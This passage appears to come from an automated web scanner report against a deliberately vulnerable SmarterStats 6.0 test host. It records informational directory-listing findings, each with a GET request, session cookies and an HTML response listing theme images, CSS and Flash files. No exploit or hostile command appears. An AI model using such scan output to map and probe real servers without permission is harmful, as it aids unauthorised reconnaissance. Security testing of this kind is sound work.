   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Window/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="CssImg/">CssImg</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
Thursday, October 07, 2010 01:00 PM 2,932 <A href="Window.css">Window.css</A>
Thursday, October 07, 2010 01:00 PM 9,790 <A href="WindowBase.css">WindowBase.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.39. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/CssImg/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Window/CssImg/

Request

GET /App_Themes/Default/Controls/Window/CssImg/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:33 GMT
Content-Length: 2305
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/CssImg/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Window/CssImg/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Window/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 73 <A href="footerResize.gif">footerResize.gif</A>
Thursday, October 07, 2010 01:00 PM 126 <A href="PopIn_UpperTile.png">PopIn_UpperTile.png</A>
Thursday, October 07, 2010 01:00 PM 55 <A href="RadWMinimizedBg.gif">RadWMinimizedBg.gif</A>
Thursday, October 07, 2010 01:00 PM 105 <A href="RadWStatus.gif">RadWStatus.gif</A>
Thursday, October 07, 2010 01:00 PM 105 <A href="RadWWrapperBodyLeft.gif">RadWWrapperBodyLeft.gif</A>
Thursday, October 07, 2010 01:00 PM 43 <A href="RadWWrapperBodyRight.gif">RadWWrapperBodyRight.gif</A>
Thursday, October 07, 2010 01:00 PM 263 <A href="RadWWrapperHeaderCenter.gif">RadWWrapperHeaderCenter.gif</A>
Thursday, October 07, 2010 01:00 PM 100 <A href="TabMiddle.GIF">TabMiddle.GIF</A>
Thursday, October 07, 2010 01:00 PM 152 <A href="TabMiddleSelected.gif">TabMiddleSelected.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.40. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Window/Img/

Request

GET /App_Themes/Default/Controls/Window/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:42 GMT
Content-Length: 1413
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Window/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Window/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,047 <A href="close.gif">close.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.41. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Flash/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Flash/

Request

GET /App_Themes/Default/Flash/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:43 GMT
Content-Length: 1706
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Flash/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Flash/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 62,389 <A href="HistographGauge.swf">HistographGauge.swf</A>
Thursday, October 07, 2010 01:00 PM 87,069 <A href="HistographGauge2.swf">HistographGauge2.swf</A>
Thursday, October 07, 2010 01:00 PM 87,079 <A href="HistographGauge3.swf">HistographGauge3.swf</A>
Thursday, October 07, 2010 01:00 PM 50,809 <A href="RadialGauge.swf">RadialGauge.swf</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.42. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/16x16/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Images/16x16/

Request

GET /App_Themes/Default/Images/16x16/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:43 GMT
Content-Length: 19709
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/16x16/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Images/16x16/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,014 <A href="AbuseDetection.gif">AbuseDetection.gif</A>
Thursday, October 07, 2010 01:00 PM 616 <A href="AccountSettings.gif">AccountSettings.gif</A>
Thursday, October 07, 2010 01:00 PM 1,048 <A href="AddCannedReply.gif">AddCannedReply.gif</A>
Thursday, October 07, 2010 01:00 PM 1,045 <A href="AddToFavoritesSide.gif">AddToFavoritesSide.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="Admin.gif">Admin.gif</A>
Thursday, October 07, 2010 01:00 PM 542 <A href="AgentStatusActiveAll.gif">AgentStatusActiveAll.gif</A>
Thursday, October 07, 2010 01:00 PM 330 <A href="AgentStatusActiveSome.gif">AgentStatusActiveSome.gif</A>
Thursday, October 07, 2010 01:00 PM 352 <A href="AgentStatusAFK.gif">AgentStatusAFK.gif</A>
Thursday, October 07, 2010 01:00 PM 348 <A href="AgentStatusInactive.gif">AgentStatusInactive.gif</A>
Thursday, October 07, 2010 01:00 PM 555 <A href="Aliases.gif">Aliases.gif</A>
Thursday, October 07, 2010 01:00 PM 616 <A href="AllArticles.gif">AllArticles.gif</A>
Thursday, October 07, 2010 01:00 PM 989 <A href="AllContacts.gif">AllContacts.gif</A>
Thursday, October 07, 2010 01:00 PM 608 <A href="AllDomains.gif">AllDomains.gif</A>
Thursday, October 07, 2010 01:00 PM 624 <A href="AllEvents.gif">AllEvents.gif</A>
Thursday, October 07, 2010 01:00 PM 1,031 <A href="AllMessages.gif">AllMessages.gif</A>
Thursday, October 07, 2010 01:00 PM 1,057 <A href="AllNotes.gif">AllNotes.gif</A>
Thursday, October 07, 2010 01:00 PM 1,024 <A href="AllRSS.gif">AllRSS.gif</A>
Thursday, October 07, 2010 01:00 PM 1,040 <A href="AllTasks.gif">AllTasks.gif</A>
Thursday, October 07, 2010 01:00 PM 583 <A href="Anti-Spam.gif">Anti-Spam.gif</A>
Thursday, October 07, 2010 01:00 PM 578 <A href="Anti-Virus.gif">Anti-Virus.gif</A>
Thursday, October 07, 2010 01:00 PM 601 <A href="Article.gif">Article.gif</A>
Thursday, October 07, 2010 01:00 PM 1,027 <A href="ArticleDraft.gif">ArticleDraft.gif</A>
Thursday, October 07, 2010 01:00 PM 140 <A href="ascx.gif">ascx.gif</A>
Thursday, October 07, 2010 01:00 PM 135 <A href="aspx.gif">aspx.gif</A>
Thursday, October 07, 2010 01:00 PM 200 <A href="Attachment.gif">Attachment.gif</A>
Thursday, October 07, 2010 01:00 PM 1,041 <A href="AutoResponder.gif">AutoResponder.gif</A>
Thursday, October 07, 2010 01:00 PM 1,054 <A href="Blacklist.gif">Blacklist.gif</A>
Thursday, October 07, 2010 01:00 PM 999 <A href="BlockedSenders.gif">BlockedSenders.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="BlueNote.gif">BlueNote.gif</A>
Thursday, October 07, 2010 01:00 PM 576 <A href="Brands.gif">Brands.gif</A>
Thursday, October 07, 2010 01:00 PM 1,028 <A href="ByAgent.gif">ByAgent.gif</A>
Thursday, October 07, 2010 01:00 PM 1,054 <A href="ByColor.gif">ByColor.gif</A>
Thursday, October 07, 2010 01:00 PM 1,000 <A href="ByDepartment.gif">ByDepartment.gif</A>
Thursday, October 07, 2010 01:00 PM 356 <A href="calendar-mapped.gif">calendar-mapped.gif</A>
Thursday, October 07, 2010 01:00 PM 615 <A href="calendar.gif">calendar.gif</A>
Thursday, October 07, 2010 01:00 PM 601 <A href="CalendarMonth.gif">CalendarMonth.gif</A>
Thursday, October 07, 2010 01:00 PM 582 <A href="CalendarWeek.gif">CalendarWeek.gif</A>
Thursday, October 07, 2010 01:00 PM 379 <A href="CatchAll.gif">CatchAll.gif</A>
Thursday, October 07, 2010 01:00 PM 594 <A href="Categories.gif">Categories.gif</A>
Thursday, October 07, 2010 01:00 PM 1,048 <A href="ChatSettings.gif">ChatSettings.gif</A>
Thursday, October 07, 2010 01:00 PM 576 <A href="ChatsInQueue.gif">ChatsInQueue.gif</A>
Thursday, October 07, 2010 01:00 PM 224 <A href="ClosedStatus.gif">ClosedStatus.gif</A>
Thursday, October 07, 2010 01:00 PM 1,019 <A href="ClosedStatus_Locked.gif">ClosedStatus_Locked.gif</A>
Thursday, October 07, 2010 01:00 PM 204 <A href="col.gif">col.gif</A>
Thursday, October 07, 2010 01:00 PM 224 <A href="Complete.gif">Complete.gif</A>
Thursday, October 07, 2010 01:00 PM 169 <A href="config.gif">config.gif</A>
Thursday, October 07, 2010 01:00 PM 610 <A href="contacts-mapped.gif">contacts-mapped.gif</A>
Thursday, October 07, 2010 01:00 PM 1,016 <A href="contacts.gif">contacts.gif</A>
Thursday, October 07, 2010 01:00 PM 126 <A href="cs.gif">cs.gif</A>
Thursday, October 07, 2010 01:00 PM 167 <A href="css.gif">css.gif</A>
Thursday, October 07, 2010 01:00 PM 843 <A href="dash.gif">dash.gif</A>
Thursday, October 07, 2010 01:00 PM 881 <A href="dashminus.gif">dashminus.gif</A>
Thursday, October 07, 2010 01:00 PM 884 <A href="dashplus.gif">dashplus.gif</A>
Thursday, October 07, 2010 01:00 PM 543 <A href="database.gif">database.gif</A>
Thursday, October 07, 2010 01:00 PM 1,037 <A href="dataIconTree.gif">dataIconTree.gif</A>
Thursday, October 07, 2010 01:00 PM 1,037 <A href="DataMining.gif">DataMining.gif</A>
Thursday, October 07, 2010 01:00 PM 633 <A href="Delete.gif">Delete.gif</A>
Thursday, October 07, 2010 01:00 PM 595 <A href="deleted.gif">deleted.gif</A>
Thursday, October 07, 2010 01:00 PM 1,023 <A href="Department.gif">Department.gif</A>
Thursday, October 07, 2010 01:00 PM 1,032 <A href="DisabledDomains.gif">DisabledDomains.gif</A>
Thursday, October 07, 2010 01:00 PM 1,037 <A href="dll.gif">dll.gif</A>
Thursday, October 07, 2010 01:00 PM 1,028 <A href="Domain.gif">Domain.gif</A>
Thursday, October 07, 2010 01:00 PM 1,025 <A href="DomainForward.gif">DomainForward.gif</A>
Thursday, October 07, 2010 01:00 PM 529 <A href="DomainKeys.gif">DomainKeys.gif</A>
Thursday, October 07, 2010 01:00 PM 616 <A href="DomainSettings.gif">DomainSettings.gif</A>
Thursday, October 07, 2010 01:00 PM 1,061 <A href="Drafts.gif">Drafts.gif</A>
Thursday, October 07, 2010 01:00 PM 298 <A href="DrillDown.gif">DrillDown.gif</A>
Thursday, October 07, 2010 01:00 PM 200 <A href="exp.gif">exp.gif</A>
Thursday, October 07, 2010 01:00 PM 549 <A href="Favorites.gif">Favorites.gif</A>
Thursday, October 07, 2010 01:00 PM 331 <A href="file.gif">file.gif</A>
Thursday, October 07, 2010 01:00 PM 595 <A href="FlaggedArticle.gif">FlaggedArticle.gif</A>
Thursday, October 07, 2010 01:00 PM 599 <A href="Folder-Mapped.gif">Folder-Mapped.gif</A>
Thursday, October 07, 2010 01:00 PM 1,027 <A href="folder.gif">folder.gif</A>
Thursday, October 07, 2010 01:00 PM 591 <A href="Folders.gif">Folders.gif</A>
Thursday, October 07, 2010 01:00 PM 583 <A href="ForwardedMessage.gif">ForwardedMessage.gif</A>
Thursday, October 07, 2010 01:00 PM 583 <A href="ForwardedMessage_High.gif">ForwardedMessage_High.gif</A>
Thursday, October 07, 2010 01:00 PM 583 <A href="ForwardedMessage_Low.gif">ForwardedMessage_Low.gif</A>
Thursday, October 07, 2010 01:00 PM 1,077 <A href="Gaant.gif">Gaant.gif</A>
Thursday, October 07, 2010 01:00 PM 119 <A href="gif.gif">gif.gif</A>
Thursday, October 07, 2010 01:00 PM 604 <A href="GlobalCalls.gif">GlobalCalls.gif</A>
Thursday, October 07, 2010 01:00 PM 607 <A href="GlobalChats.gif">GlobalChats.gif</A>
Thursday, October 07, 2010 01:00 PM 642 <A href="globalTasks.gif">globalTasks.gif</A>
Thursday, October 07, 2010 01:00 PM 641 <A href="GlobalTickets.gif">GlobalTickets.gif</A>
Thursday, October 07, 2010 01:00 PM 340 <A href="Globe.gif">Globe.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="GreenNote.gif">GreenNote.gif</A>
Thursday, October 07, 2010 01:00 PM 989 <A href="Group.gif">Group.gif</A>
Thursday, October 07, 2010 01:00 PM 1,068 <A href="Hostnames.gif">Hostnames.gif</A>
Thursday, October 07, 2010 01:00 PM 597 <A href="HTML.gif">HTML.gif</A>
Thursday, October 07, 2010 01:00 PM 996 <A href="ImportUser.gif">ImportUser.gif</A>
Thursday, October 07, 2010 01:00 PM 1,079 <A href="inbox.gif">inbox.gif</A>
Thursday, October 07, 2010 01:00 PM 550 <A href="IncomingCalls.gif">IncomingCalls.gif</A>
Thursday, October 07, 2010 01:00 PM 331 <A href="Incomplete.gif">Incomplete.gif</A>
Thursday, October 07, 2010 01:00 PM 631 <A href="InsertColumn.gif">InsertColumn.gif</A>
Thursday, October 07, 2010 01:00 PM 624 <A href="journal.gif">journal.gif</A>
Thursday, October 07, 2010 01:00 PM 119 <A href="jpg.gif">jpg.gif</A>
Thursday, October 07, 2010 01:00 PM 139 <A href="js.gif">js.gif</A>
Thursday, October 07, 2010 01:00 PM 1,050 <A href="Junk.gif">Junk.gif</A>
Thursday, October 07, 2010 01:00 PM 1,063 <A href="MailingList.gif">MailingList.gif</A>
Thursday, October 07, 2010 01:00 PM 294 <A href="MajorReview.gif">MajorReview.gif</A>
Thursday, October 07, 2010 01:00 PM 590 <A href="MessageArchive.gif">MessageArchive.gif</A>
Thursday, October 07, 2010 01:00 PM 363 <A href="MessageFlagIndicatorOff.gif">MessageFlagIndicatorOff.gif</A>
Thursday, October 07, 2010 01:00 PM 585 <A href="MessageFlagIndicatorOn.gif">MessageFlagIndicatorOn.gif</A>
Thursday, October 07, 2010 01:00 PM 1,005 <A href="MyCalendar.gif">MyCalendar.gif</A>
Thursday, October 07, 2010 01:00 PM 601 <A href="MyCalls.gif">MyCalls.gif</A>
Thursday, October 07, 2010 01:00 PM 990 <A href="MyChats.gif">MyChats.gif</A>
Thursday, October 07, 2010 01:00 PM 1,061 <A href="MyNotes.gif">MyNotes.gif</A>
Thursday, October 07, 2010 01:00 PM 1,048 <A href="MyTasks.gif">MyTasks.gif</A>
Thursday, October 07, 2010 01:00 PM 1,048 <A href="MyTickets.gif">MyTickets.gif</A>
Thursday, October 07, 2010 01:00 PM 1,016 <A href="NewArticle.gif">NewArticle.gif</A>
Thursday, October 07, 2010 01:00 PM 998 <A href="newContact.gif">newContact.gif</A>
Thursday, October 07, 2010 01:00 PM 1,032 <A href="newEvent.gif">newEvent.gif</A>
Thursday, October 07, 2010 01:00 PM 1,035 <A href="NewMessage.gif">NewMessage.gif</A>
Thursday, October 07, 2010 01:00 PM 1,045 <A href="NewNote.gif">NewNote.gif</A>
Thursday, October 07, 2010 01:00 PM 1,055 <A href="NewRSS.gif">NewRSS.gif</A>
Thursday, October 07, 2010 01:00 PM 1,039 <A href="NewTask.gif">NewTask.gif</A>
Thursday, October 07, 2010 01:00 PM 1,044 <A href="NewTicket.gif">NewTicket.gif</A>
Thursday, October 07, 2010 01:00 PM 1,036 <A href="Note.gif">Note.gif</A>
Thursday, October 07, 2010 01:00 PM 969 <A href="notes-mapped.gif">notes-mapped.gif</A>
Thursday, October 07, 2010 01:00 PM 366 <A href="notes.gif">notes.gif</A>
Thursday, October 07, 2010 01:00 PM 1,042 <A href="NotificationProfiles.gif">NotificationProfiles.gif</A>
Thursday, October 07, 2010 01:00 PM 224 <A href="OpenStatus.gif">OpenStatus.gif</A>
Thursday, October 07, 2010 01:00 PM 346 <A href="OutgoingCalls.gif">OutgoingCalls.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="PinkNote.gif">PinkNote.gif</A>
Thursday, October 07, 2010 01:00 PM 330 <A href="Pinned.gif">Pinned.gif</A>
Thursday, October 07, 2010 01:00 PM 632 <A href="PopRetrieval.gif">PopRetrieval.gif</A>
Thursday, October 07, 2010 01:00 PM 610 <A href="print.gif">print.gif</A>
Thursday, October 07, 2010 01:00 PM 1,025 <A href="Private.gif">Private.gif</A>
Thursday, October 07, 2010 01:00 PM 551 <A href="Propagation.gif">Propagation.gif</A>
Thursday, October 07, 2010 01:00 PM 1,055 <A href="ProtocolSettings.gif">ProtocolSettings.gif</A>
Thursday, October 07, 2010 01:00 PM 571 <A href="ReadChat.gif">ReadChat.gif</A>
Thursday, October 07, 2010 01:00 PM 590 <A href="ReadMessage.gif">ReadMessage.gif</A>
Thursday, October 07, 2010 01:00 PM 589 <A href="ReadMessage_High.gif">ReadMessage_High.gif</A>
Thursday, October 07, 2010 01:00 PM 589 <A href="ReadMessage_Low.gif">ReadMessage_Low.gif</A>
Thursday, October 07, 2010 01:00 PM 344 <A href="Recurring.gif">Recurring.gif</A>
Thursday, October 07, 2010 01:00 PM 374 <A href="RepliedMessage.gif">RepliedMessage.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="RepliedMessage_High.gif">RepliedMessage_High.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="RepliedMessage_Low.gif">RepliedMessage_Low.gif</A>
Thursday, October 07, 2010 01:00 PM 325 <A href="reports.gif">reports.gif</A>
Thursday, October 07, 2010 01:00 PM 1,017 <A href="Reports2.gif">Reports2.gif</A>
Thursday, October 07, 2010 01:00 PM 331 <A href="Reports3.gif">Reports3.gif</A>
Thursday, October 07, 2010 01:00 PM 635 <A href="Reports4.gif">Reports4.gif</A>
Thursday, October 07, 2010 01:00 PM 1,037 <A href="RSS.gif">RSS.gif</A>
Thursday, October 07, 2010 01:00 PM 829 <A href="s.gif">s.gif</A>
Thursday, October 07, 2010 01:00 PM 357 <A href="Search.gif">Search.gif</A>
Thursday, October 07, 2010 01:00 PM 616 <A href="SenderPriorityOverrides.gif">SenderPriorityOverrides.gif</A>
Thursday, October 07, 2010 01:00 PM 1,077 <A href="sentItems.gif">sentItems.gif</A>
Thursday, October 07, 2010 01:00 PM 632 <A href="Servers.gif">Servers.gif</A>
Thursday, October 07, 2010 01:00 PM 377 <A href="Settings.gif">Settings.gif</A>
Thursday, October 07, 2010 01:00 PM 581 <A href="Skins.gif">Skins.gif</A>
Thursday, October 07, 2010 01:00 PM 562 <A href="SmarterMailSync.gif">SmarterMailSync.gif</A>
Thursday, October 07, 2010 01:00 PM 956 <A href="SmarterTools.gif">SmarterTools.gif</A>
Thursday, October 07, 2010 01:00 PM 562 <A href="SoundOFF.gif">SoundOFF.gif</A>
Thursday, October 07, 2010 01:00 PM 565 <A href="SoundON.gif">SoundON.gif</A>
Thursday, October 07, 2010 01:00 PM 613 <A href="SpamAssassin.gif">SpamAssassin.gif</A>
Thursday, October 07, 2010 01:00 PM 550 <A href="SpellCheck.gif">SpellCheck.gif</A>
Thursday, October 07, 2010 01:00 PM 1,016 <A href="Spool.gif">Spool.gif</A>
Thursday, October 07, 2010 01:00 PM 1,035 <A href="StaleArticles.gif">StaleArticles.gif</A>
Thursday, October 07, 2010 01:00 PM 1,031 <A href="Status_Diagnostic.gif">Status_Diagnostic.gif</A>
Thursday, October 07, 2010 01:00 PM 1,033 <A href="Tasks-Mapped.gif">Tasks-Mapped.gif</A>
Thursday, October 07, 2010 01:00 PM 1,033 <A href="tasks.gif">tasks.gif</A>
Thursday, October 07, 2010 01:00 PM 1,028 <A href="TicketAssigned.gif">TicketAssigned.gif</A>
Thursday, October 07, 2010 01:00 PM 547 <A href="TicketDeleted.gif">TicketDeleted.gif</A>
Thursday, October 07, 2010 01:00 PM 596 <A href="TicketRead.gif">TicketRead.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="TicketsInQueue.gif">TicketsInQueue.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="TicketUnread.gif">TicketUnread.gif</A>
Thursday, October 07, 2010 01:00 PM 612 <A href="Today.gif">Today.gif</A>
Thursday, October 07, 2010 01:00 PM 562 <A href="Transfer.gif">Transfer.gif</A>
Thursday, October 07, 2010 01:00 PM 558 <A href="Translate.gif">Translate.gif</A>
Thursday, October 07, 2010 01:00 PM 556 <A href="Translate2.gif">Translate2.gif</A>
Thursday, October 07, 2010 01:00 PM 587 <A href="UnreadChat.gif">UnreadChat.gif</A>
Thursday, October 07, 2010 01:00 PM 1,008 <A href="UnreadMessage.gif">UnreadMessage.gif</A>
Thursday, October 07, 2010 01:00 PM 1,012 <A href="UnreadMessage_High.gif">UnreadMessage_High.gif</A>
Thursday, October 07, 2010 01:00 PM 1,012 <A href="UnreadMessage_Low.gif">UnreadMessage_Low.gif</A>
Thursday, October 07, 2010 01:00 PM 399 <A href="Upcoming.gif">Upcoming.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="User.gif">User.gif</A>
Thursday, October 07, 2010 01:00 PM 381 <A href="userBlack-check.gif">userBlack-check.gif</A>
Thursday, October 07, 2010 01:00 PM 369 <A href="userBlack.gif">userBlack.gif</A>
Thursday, October 07, 2010 01:00 PM 579 <A href="userDisabled.gif">userDisabled.gif</A>
Thursday, October 07, 2010 01:00 PM 383 <A href="userGreen-check.gif">userGreen-check.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="userGreen.gif">userGreen.gif</A>
Thursday, October 07, 2010 01:00 PM 384 <A href="userRed-check.gif">userRed-check.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="userRed.gif">userRed.gif</A>
Thursday, October 07, 2010 01:00 PM 380 <A href="userWhite-check.gif">userWhite-check.gif</A>
Thursday, October 07, 2010 01:00 PM 363 <A href="userWhite.gif">userWhite.gif</A>
Thursday, October 07, 2010 01:00 PM 130 <A href="vb.gif">vb.gif</A>
Thursday, October 07, 2010 01:00 PM 224 <A href="WaitingStatus.gif">WaitingStatus.gif</A>
Thursday, October 07, 2010 01:00 PM 1,044 <A href="Whitelist.gif">Whitelist.gif</A>
Thursday, October 07, 2010 01:00 PM 1,016 <A href="Write.gif">Write.gif</A>
Thursday, October 07, 2010 01:00 PM 229 <A href="xml.gif">xml.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="YellowNote.gif">YellowNote.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.43. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/Pager/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Images/Pager/

Request

GET /App_Themes/Default/Images/Pager/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:48 GMT
Content-Length: 2815
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Pager/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
